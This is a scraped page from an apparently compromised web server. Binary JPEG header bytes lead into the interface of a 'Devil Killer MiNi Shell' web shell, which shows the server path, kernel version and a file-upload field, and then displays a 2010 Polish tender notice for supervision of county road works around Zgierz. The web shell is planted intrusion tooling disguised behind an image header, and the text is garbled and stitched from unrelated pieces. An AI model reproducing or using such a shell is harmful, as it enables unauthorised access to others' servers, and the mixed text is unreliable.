JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100224/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100224/38203-N-2010.html

<p class="kh_header"><b>Zgierz: Nadzór inwestorski nad robotami utrzymaniowymi i inwestycjami w zakresie budowy
 i przebudowy dróg powiatowych - 3 zadania</b><br>
<b>Numer ogłoszenia: 38203 - 2010; data zamieszczenia: 24.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Zgierskiego , ul. Sadowa 6A, 95-100 Zgierz, woj. łódzkie, tel. 042 7190885, faks 042 7190816.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski nad robotami utrzymaniowymi i inwestycjami w zakresie budowy
 i przebudowy dróg powiatowych - 3 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest pełnienie usługi nadzoru inwestorskiego nad robotami utrzymaniowymi i inwestycjami w zakresie budowy i przebudowy  dróg powiatowych Powiatu Zgierskiego. 
2.	Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem. Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.

3.	Wykonawca zobowiązany jest się do dokonania czynności wymienionych w ust. 2, z należytą starannością w oparciu o aktualne unormowania prawne wynikające z zapisów art. 25 i 26 Ustawy z dnia 07.07.1994. Prawo Budowlane (t.j. Dz. U. Nr 156 z 2006 r., poz. 1118 
z póź. zm.), zgodnie z obowiązującymi standardami, zasadami sztuki budowlanej, przepisami BHP oraz etyką zawodową.

4.	Przedmiot zamówienia został podzielony na 3 części oznaczone, jako zadania:

1)	Zadanie 1 : 

Nadzór inwestorski nad  robotami utrzymaniowymi i inwestycjami w zakresie budowy i przebudowy dróg powiatowych, na terenie miasta i gminy Zgierz. 

2) Zadanie Nr 2:

Nadzór inwestorski nad  robotami utrzymaniowymi i inwestycjami w zakresie budowy i przebudowy dróg powiatowych, na terenie miasta i gminy Aleksandrów Łódzki,  gminy Parzęczew, miasta i gminy Ozorków, oraz nadzór inwestorski nad remontami cząstkowymi nawierzchni bitumicznych emulsją i grysami oraz mieszanką mineralno - bitumiczną na terenie miasta i gminy Aleksandrów Łódzki oraz gmin: Ozorków i Parzęczew.



3) Zadanie Nr 3:
 
Nadzór inwestorski nad robotami utrzymaniowymi i inwestycjami w zakresie budowy i przebudowy dróg powiatowych, na terenie miasta i gminy Stryków, oraz miasta i gminy Głowno, oraz nadzór inwestorski nad remontami cząstkowymi nawierzchni bitumicznych emulsją i grysami oraz mieszanką mineralno - bitumiczną na terenie miasta i gminy Stryków  oraz gmin: Głowno i Zgierz.



UWAGA: Zamawiający zastrzega, że Wykonawca może złożyć ofertę maksymalnie na 2 części zamówienia.

Zamawiający  nie zawiera umowy ramowej i nie ustanawia dynamicznego systemu zakupów, oraz nie stosuje aukcji elektronicznej przy wyborze najkorzystniejszej oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające polegające na powtórzeniu tego samego rodzaju zamówień, co zamówienie podstawowe zgodnie z art. 67 ust. 1 pkt 6 Ustawy ( usługi nadzoru inwestorskiego nad robotami utrzymaniowymi i inwestycjami w zakresie budowy i przebudowy  dróg powiatowych Powiatu Zgierskiego) w ramach poszczególnych zadań. Zakres zamówień uzupełniających  - nie więcej niż 50 % wartości zamówienia podstawowego, w ramach danego zadania.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie ze wzorem określonym w załączniku Nr 4 do SIWZ.
Ocena spełnienia warunku udziału w Postępowaniu zostanie dokonana metodą spełnia/nie  spełnia w oparciu o oświadczenie o spełnianiu warunków udziału 
w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie ze wzorem określonym w załączniku Nr 4 do SIWZ
Ocena spełnienia warunku udziału w Postępowaniu zostanie dokonana metodą spełnia/nie  spełnia w oparciu o oświadczenie o spełnianiu warunków udziału 
w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie ze wzorem określonym w załączniku Nr 4 do SIWZ.
Ocena spełnienia warunku udziału w Postępowaniu zostanie dokonana metodą spełnia/nie  spełnia w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełniania niniejszego warunku Wykonawca musi wykazać dysponowanie min. 1 osobą  (odrębnie dla danego zadania) zdolną do wykonania zamówienia, która będzie pełnić funkcję inspektora nadzoru inwestycyjnego posiadającą uprawnienia budowlane do nadzorowania robót budowlanych w specjalności konstrukcyjno-budowlanej lub drogowej. Ponadto, Wykonawca zobowiązany jest złożyć oświadczenie potwierdzające, że osoby, które będą uczestniczyć w realizacji zamówienia, posiadają uprawnienia zawodowe do pełnienia samodzielnych funkcji w budownictwie oraz potwierdzające aktualną przynależność tych osób do właściwej izby samorządu zawodowego.
Ocena spełnienia warunku udziału w Postępowaniu zostanie dokonana metodą spełnia/nie  spełnia w oparciu o wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, zgodnie z załącznikiem Nr 5 do SIWZ oraz w oparciu o oświadczenie że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełniania niniejszego warunku Wykonawcy musi wykazać, iż w zakresie prowadzonej działalności związanej z przedmiotem zamówienia jest ubezpieczony od odpowiedzialności cywilnej na sumę gwarancyjną minimum 500.000,00 zł za wszystkie wypadki ubezpieczeniowe. Ocena warunku udziału w Postępowaniu zostanie dokonana metodą spełnia/ nie spełnia w oparciu o opłaconą polisę ubezpieczeniową OC, a w przypadku jej braku inny dokument potwierdzający ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie wymaganym przez Zamawiającego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>6.	Zmiany do treści niniejszej umowy będą dopuszczalne jedynie w przypadku:

1)	 zmiany ogólne :
a)	zmiana adresu/siedziby Zamawiającego/Wykonawcy,
b)	zmiana osób występujących po stronie Zamawiającego/Wykonawcy,
2)	zmiany rzutujące na termin wykonania umowy: 
a)	przedłużenia terminu zakończenia umowy o czas opóźnienia, jeśli opóźnienie to wynika 
z przyczyn leżących po stronie Zamawiającego i jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy, w zakresie następujących obowiązków Zamawiającego:
przekazanie terenu budowy,
przekazanie dokumentów budowy,
b)	zmiana terminu wykonania umowy, ewentualnie wstrzymanie/wznowienie robót,                 ze względu na:
oczekiwanie Wykonawcy na niezbędne opinie, decyzje,
przedłużenie procedury przetargowej,
uwarunkowania społeczne (protesty, listy, petycje, itp.),
 konieczność prowadzenia uzgodnień z właścicielami nieruchomości,
technologię wykonywania robót,
zmiany stanu prawnego,
niesprzyjające warunki atmosferyczne,
działania sił natury, uznanych za stan klęski żywiołowej.
UWAGA: Wykonawca nie będzie miał prawa do przedłużenia terminu zakończenia umowy, jeżeli     przedłużenie terminu wynika z przyczyn leżących po stronie Wykonawcy.

3)	zmiany rzutujące na wysokość wynagrodzenia: 
zmiana postanowień umowy w związku ze zmianą stawki podatku od towarów i usług (VAT) 
w przypadku zmiany obowiązujących, w tym w zakresie przepisów.

7.	Określa się następujący tryb dokonywania zmian postanowień umowy:
1)	zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności,
2)	strona występująca o zmianę postanowień  zawartej umowy zobowiązana jest do udokumentowania zaistnienia powyższych okoliczności,
3)	wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starostwo.zgierz.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Zgierzu ul. Sadowa 6A, pok. 314 lub za zaliczeniem pocztowym, zamówienie na numer fax 427175484.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2010 godzina 10:00, miejsce: Starostwo Powiatowe w Zgierzu ul. Sadowa 6 A , pok. 112 Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nadzór inwestorski nad  robotami utrzymaniowymi i inwestycjami w zakresie budowy i przebudowy dróg powiatowych, na terenie miasta i gminy Zgierz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zadania Nr 1 Wykonawca zobowiązany jest do świadczenia usługi nadzoru inwestorskiego nad następującymi inwestycjami:



ZADANIE NR 1

Lp.	Nazwa inwestycji objętej usługą nadzoru inwestorskiego	Szacunkowa wartość inwestycji objętej usługą nadzoru inwestorskiego - brutto
1	Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5133 E 
ul. Główna w m. Dąbrówka Wielka, gm. Zgierz.	340 000,00 zł
2	Przebudowa  drogi powiatowej Nr 5122 E i Nr 5144 E w m. Rosanów, gm. Zgierz.	700 000,00 zł
3	Wykonanie nakładki w pasie drogi powiatowej Nr 5142 E 
w m. Ustronie, gm. Zgierz. 	50 000,00 zł
4	Wykonanie nakładki w pasie drogi powiatowej Nr 5132 E 
- ul. Cegielniana w m. Dąbrówka Wielka, gm. Zgierz. 	400 000,00 zł
5	Przebudowa drogi gruntowej Nr 5106 E relacji Zgierz - Kębliny. 	768 000,00 zł
6	Przebudowa drogi powiatowej Nr 5136 E relacji Jastrzębie Górne - Zgierz   (Wiosny Ludów), wraz z wykonaniem nakładki asfaltowej
 i przebudową istniejących chodników. 	1 700 000,00 zł
7	Przebudowa drogi powiatowej Nr 5131 E relacji Łagiewniki - Szczawin, gm. Zgierz.	300.000,00 zł

Termin wykonania zamówienia:

1)	Od dnia zawarcia umowy do dnia 31.12.2010r. 
2)	Nadzór inwestorski nad poszczególnymi etapami wchodzącymi w skład  poszczególnej części przedmiotu zamówienia,
3)	data rozpoczęcia: od dnia rozpoczęcia robót budowlanych przez wykonawcę robót budowlanych objętych usługą nadzoru inwestorskiego,
4)	data zakończenia: do dnia zakończenia i odbioru wszystkich robót oraz przekazania do użytkowania nadzorowanej inwestycji.

Na co najmniej 7 dni przed planowanym terminem rozpoczęcia robót budowlanych objętych usługą nadzoru inwestorskiego Naczelnik Wydziału Drogownictwa Starostwa Powiatowego w Zgierzu na piśmie zawiadomi Wykonawcę o terminie rozpoczęcia usługi realizowanej w ramach danego etapu poszczególnej części przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nadzór inwestorski nad  robotami utrzymaniowymi i inwestycjami w zakresie budowy i przebudowy dróg powiatowych, na terenie miasta i gminy Aleksandrów Łódzki,  gminy Parzęczew, miasta i gminy Ozorków, oraz nadzór inwestorski nad remontami cząstkowymi nawierzchni bitumicznych emulsją i grysami oraz mieszanką mineralno - bitumiczną na terenie miasta i gminy Aleksandrów Łódzki oraz gmin: Ozorków i Parzęczew.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zadania Nr 2 Wykonawca zobowiązany jest do świadczenia usługi nadzoru inwestorskiego nad następującymi inwestycjami:

ZADANIE NR 2

Nazwa inwestycji objętej usługą nadzoru inwestorskiego	Szacunkowa wartość inwestycji objętej usługą nadzoru inwestorskiego - brutto
Wykonanie nakładki w pasie drogi powiatowej Nr 1134 E na odcinku Rąbień - Wola Grzymkowa, gm. Aleksandrów Łódzki
	375 000,00 zł
Wykonanie nakładki w pasie drogi powiatowej Nr 5166 E relacji Aleksandrów - gr. Powiatu (Lutomiersk), gm. Aleksandrów Łódzki
	550 000,00 zł
Wykonanie nakładki w pasie drogi powiatowej Nr 5137 E na odcinku Parzęczew - Łążki, gm. Parzęczew	150.000,00 zł
Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5128 E 
- ul. Jagiellońska w m. Sokolniki Las, gm. Ozorków. 	100 000,00 zł
Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5150 E
 w m. Leśmierz, gm. Ozorków.	              100 000,00 zł
Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 2513 E w m. Leśmierz, gm. Ozorków (odcinek od budynku Gminnego Ośrodka Kultury w kierunku Czerchowa). 	150 000,00 zł
Wykonanie nakładki w pasie drogi powiatowej Nr 5128 E - 
ul. Narutowicza w m. Sokolniki, gm. Ozorków. 	300 000,00 zł
Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5173 E - 
ul. Zgierska w Ozorkowie. 	50 000,00 zł
Remont  cząstkowy nawierzchni  bitumicznych mieszanką mineralno-asfaltową na terenie miasta i gminy Aleksandrów Łódzki	88.000,00 zł



Remont  cząstkowy nawierzchni  bitumicznych mieszanką mineralno -asfaltową na terenie gmin: Ozorków i Parzęczew	88.000,00 zł
Remont  cząstkowy nawierzchni  bitumicznych przy użyciu emulsji asfaltowej   i grysów  na terenie miasta i gminy Aleksandrów Łódzki	47.000,00 zł
Remont  cząstkowy nawierzchni  bitumicznych przy użyciu emulsji asfaltowej i grysów  na terenie gmin: Ozorków i Parzęczew	47.000,00 zł
Termin wykonania zamówienia:

1)	Od dnia zawarcia umowy do dnia 31.12.2010r. 
2)	Nadzór inwestorski nad poszczególnymi etapami wchodzącymi w skład  poszczególnej części przedmiotu zamówienia,
3)	data rozpoczęcia: od dnia rozpoczęcia robót budowlanych przez wykonawcę robót budowlanych objętych usługą nadzoru inwestorskiego,
4)	data zakończenia: do dnia zakończenia i odbioru wszystkich robót oraz przekazania do użytkowania nadzorowanej inwestycji.

Na co najmniej 7 dni przed planowanym terminem rozpoczęcia robót budowlanych objętych usługą nadzoru inwestorskiego Naczelnik Wydziału Drogownictwa Starostwa Powiatowego w Zgierzu na piśmie zawiadomi Wykonawcę o terminie rozpoczęcia usługi realizowanej w ramach danego etapu poszczególnej części przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Nadzór inwestorski nad robotami utrzymaniowymi i inwestycjami w zakresie budowy i przebudowy dróg powiatowych, na terenie miasta i gminy Stryków, oraz miasta i gminy Głowno, oraz nadzór inwestorski nad remontami cząstkowymi nawierzchni bitumicznych emulsją i grysami oraz mieszanką mineralno - bitumiczną na terenie miasta i gminy Stryków  oraz gmin: Głowno i Zgierz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zadania Nr 3 Wykonawca zobowiązany jest do świadczenia usługi nadzoru inwestorskiego nad następującymi inwestycjami:


ZADANIE NR 3

Lp.	Nazwa inwestycji objętej usługą nadzoru inwestorskiego	Szacunkowa wartość inwestycji objętej usługą nadzoru inwestorskiego - brutto

1	Przebudowa drogi gruntowej Nr 5115 E relacji Wola Mąkolska - Popów - gr. powiatu (Jasionna)	550 000,00 zł
2	Przebudowa drogi powiatowej Nr 5101 E - ul. Bielawska w Głownie 
	100 000,00 zł
3	Wykonanie nakładki w pasie drogi powiatowej Nr 5103 E relacji Niesułków - gr. powiatu (Kołacin), gm. Stryków. 	150 000,00 zł
4	Przebudowa chodnika w pasie drogi powiatowej Nr 5113 E  - ul. Mickiewicza Strykowie. 	120 000,00 zł
5	Przebudowa chodnika w pasie drogi powiatowej Nr 5112 E - ul. Szkolna w m. Bratoszewice, gm. Styków. 	90  000,00 zł
6	Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5129 E ul. Starowiejska w m. Dobra, gm. Stryków. 
	120 000,00 zł
7	Przebudowa chodnika w pasie drogi powiatowej Nr 5101 E ul. Swoboda w Głownie. 	180 000,00 zł
8	Wykonanie nakładki na drodze powiatowej Nr 5113 E - ul. Mickiewicza w Strykowie.	80  000,00 zł
